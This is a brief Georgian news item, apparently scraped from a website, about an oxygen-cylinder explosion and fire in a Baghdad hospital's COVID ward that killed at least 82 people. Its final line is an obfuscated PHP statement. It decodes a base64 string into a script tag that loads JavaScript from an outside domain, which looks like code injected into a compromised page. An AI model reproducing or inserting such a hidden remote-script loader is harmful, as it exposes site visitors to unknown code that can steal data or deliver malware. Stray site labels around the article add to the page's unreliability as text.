celsiusi
ავერსი საქკაბელი
 
BBC-ის ინფორმაციით, ერაყის დედაქალაქ ბაღდადში, ერთ-ერთი კლინიკის ინტენსიური თერაპიის განყოფილებაში, სადაც­ კოვიდინფიცირებული პაციენტები მკურნალობდნენ, აფეთქება მოხდა. განყოფილებაში ჟანგბადის ბალონი აფეთქდა, რასაც ძლიერი ხანძარი მოჰყვა.
 
ხანძრის შედეგად სულ მცირე 82 ადამიანი დაიღუპა.
 
გამოცემის ინფორმაციით, საავადმყოფოს ხანძარსაწინააღმდეგო სისტემა არ ჰქონდა, რის გამოც ცეცხლი სწრაფად გავრცელდა. შემთხვევის შედეგად 100-ზე მეტი ადამიანი დაშავდა. რამდენიმე მათგანის მდგომარეობა კრიტიკულია.
2011
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");